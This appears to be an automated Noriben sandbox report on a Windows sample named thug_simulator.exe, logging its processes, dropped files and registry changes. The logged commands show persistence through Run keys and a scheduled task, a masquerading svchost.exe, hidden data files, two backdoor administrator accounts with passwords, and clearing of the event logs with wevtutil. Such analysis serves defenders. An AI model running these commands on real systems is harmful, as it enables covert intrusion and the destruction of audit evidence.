-=] Sandbox Analysis Report generated by Noriben v2.0.0
-=] https://github.com/Rurik/Noriben
-=] Processing time: 2.61 seconds
-=] Analysis time: 1.58 seconds

Processes Created:
==================
[CreateProcess] thug_simulator.exe:1976 > "cmd.exe /c %AllUsersProfile%\asefa.bat"  [Child PID: 2128]
[CreateProcess] cmd.exe:2128 > "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run "  [Child PID: 2904]
[CreateProcess] cmd.exe:2128 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /t REG_SZ /d %AllUsersProfile%\SecurityUpdate\svchost.exe /f "  [Child PID: 5936]
[CreateProcess] cmd.exe:2128 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v SecurityScan /t REG_SZ /d %AllUsersProfile%\SecurityUpdate\svchost.exe /f "  [Child PID: 3312]
[CreateProcess] cmd.exe:2128 > "schtasks /create /tn WindowsUpdateCheck /tr %AllUsersProfile%\SecurityUpdate\svchost.exe /sc onlogon /rl HIGHEST /f "  [Child PID: 4792]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\config.dat "  [Child PID: 5956]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\network.dat "  [Child PID: 4476]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\dns.dat "  [Child PID: 4272]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\connections.dat "  [Child PID: 1984]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\accounts.dat "  [Child PID: 3464]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\userlist.dat "  [Child PID: 5932]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\services.dat "  [Child PID: 3904]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\jobs.dat "  [Child PID: 4468]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\apps.dat "  [Child PID: 1708]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\autorun.dat "  [Child PID: 892]
[CreateProcess] cmd.exe:2128 > "attrib +h +s %AllUsersProfile%\SecurityUpdate "  [Child PID: 5756]
[CreateProcess] cmd.exe:2128 > "net user Administators Secur1ty@2025 /add "  [Child PID: 4244]
[CreateProcess] net.exe:4244 > "%WinDir%\system32\net1 user Administators Secur1ty@2025 /add "  [Child PID: 6692]
[CreateProcess] cmd.exe:2128 > "net localgroup Administrators Administators /add "  [Child PID: 5896]
[CreateProcess] net.exe:5896 > "%WinDir%\system32\net1 localgroup Administrators Administators /add "  [Child PID: 1508]
[CreateProcess] cmd.exe:2128 > "net user SYSTEM_SERVICE Svc@Admin#99 /add "  [Child PID: 8096]
[CreateProcess] net.exe:8096 > "%WinDir%\system32\net1 user SYSTEM_SERVICE Svc@Admin#99 /add "  [Child PID: 2440]
[CreateProcess] cmd.exe:2128 > "net localgroup Administrators SYSTEM_SERVICE /add "  [Child PID: 5296]
[CreateProcess] net.exe:5296 > "%WinDir%\system32\net1 localgroup Administrators SYSTEM_SERVICE /add "  [Child PID: 6520]
[CreateProcess] cmd.exe:2128 > "wevtutil cl System "  [Child PID: 7996]
[CreateProcess] cmd.exe:2128 > "wevtutil cl Security "  [Child PID: 3864]
[CreateProcess] cmd.exe:2128 > "wevtutil cl Application "  [Child PID: 4716]

File Activity:
==================
[CreateFolder] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate
[CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate\update.log  [SHA256: 2e6ba70f0fac26812d9267536181c2ee6676211889f955b356329e140465b4ae]
[CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm  [SHA256: 7183fbf556628a122f3e51c62034dcc428a79586f1f7eb7c94600968ca2eb66a]
[CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm  [SHA256: 7183fbf556628a122f3e51c62034dcc428a79586f1f7eb7c94600968ca2eb66a]
[CreateFile] thug_simulator.exe:1976 > %UserProfile%\Documents\SecurityAdvisory.docm:Zone.Identifier  [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0]
[CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\image_downloader.exe  [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910]
[CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\image_downloader.exe:Zone.Identifier  [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0]
[CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\fileview.exe  [SHA256: bfb1a374772cccc06440ee3def14d6556d3b51c9e6de95b69917798b235e733b]
[CreateFile] thug_simulator.exe:1976 > %WinDir%\Temp\fileview.exe:Zone.Identifier  [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0]
[CreateFile] thug_simulator.exe:1976 > %Public%\Pictures\frontpage.jpg  [SHA256: 4e24eaca0183c81d776dbcf5b35afd601f536f127565e20780d71a3bab3e0170]
[CreateFile] thug_simulator.exe:1976 > %Public%\Pictures\frontpage.jpg:Zone.Identifier  [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0]
[CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\asefa.bat  [File no longer exists]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\autorun.dat  [SHA256: ee0c7791807b985c1b693c1b8a6caa92483c2c2257142f96e05dbb624d0d66d5]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe  [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe  [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe  [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe:Zone.Identifier  [SHA256: 24f6363816f6c9c3bcd638c2adf327e7ff4b2c437f4f5bd3801ee2bee86902f0]
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\SecurityUpdate\svchost.exe  [SHA256: e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910]
[CreateFile] attrib.exe:5956 > %AllUsersProfile%\config.dat  [SHA256: f8e898e6e020b92542763c35899bb225035bfc22f98d01376020d7cc3b619bc5]
[CreateFile] attrib.exe:4476 > %AllUsersProfile%\network.dat  [SHA256: d91bbff2766f226886d4b7009f0f750249e84782d479da0b5c9c101938304a36]
[CreateFile] attrib.exe:4272 > %AllUsersProfile%\dns.dat  [SHA256: 807a39cfa3f849fe8ce6b12ba5791fb4e5b61c0063320dbdcf0f92b86004ac03]
[CreateFile] attrib.exe:1984 > %AllUsersProfile%\connections.dat  [SHA256: 8580e55c18a2d73067cc03a9a57b65b17b66f76dcd5f16fe089bcc4d9515232c]
[CreateFile] attrib.exe:3464 > %AllUsersProfile%\accounts.dat  [SHA256: 32a247d809d6ddd363444b2e6afba3319e482fb9e404ac778fdd07178cfd398a]
[CreateFile] attrib.exe:5932 > %AllUsersProfile%\userlist.dat  [SHA256: 1977cd3ed538bd559208f9ae7dea401dd70b6020173be06cfe1aa7a3a7c62794]
[CreateFile] attrib.exe:3904 > %AllUsersProfile%\services.dat  [SHA256: d584a1159003e15ce9963d605112d056a6dd15e4106d7594c76c39feaa27ba27]
[CreateFile] attrib.exe:4468 > %AllUsersProfile%\jobs.dat  [SHA256: 0f3668aa14f800a9fa7fe810fea4ac138cfe4f1de023f41a2bc5bf398ad07b15]
[CreateFile] attrib.exe:1708 > %AllUsersProfile%\apps.dat  [SHA256: 62ba69ea9e942b5d90f184bd96de216475f0c91b68dfafdecc65b24194db5ccf]
[CreateFile] attrib.exe:892 > %AllUsersProfile%\autorun.dat  [SHA256: ee0c7791807b985c1b693c1b8a6caa92483c2c2257142f96e05dbb624d0d66d5]
[CreateFolder] attrib.exe:5756 > %AllUsersProfile%\SecurityUpdate
[CreateFile] cmd.exe:2128 > %AllUsersProfile%\asefa.bat  [File no longer exists]
[CreateFile] thug_simulator.exe:1976 > %AllUsersProfile%\SecurityUpdate\update.log  [SHA256: 2e6ba70f0fac26812d9267536181c2ee6676211889f955b356329e140465b4ae]

Registry Activity:
==================
[RegSetValue] reg.exe:5936 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = C:\ProgramData\SecurityUpdate\svchost.exe
[RegSetValue] reg.exe:3312 > HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\SecurityScan = C:\ProgramData\SecurityUpdate\svchost.exe

Network Traffic:
==================

Unique Hosts:
==================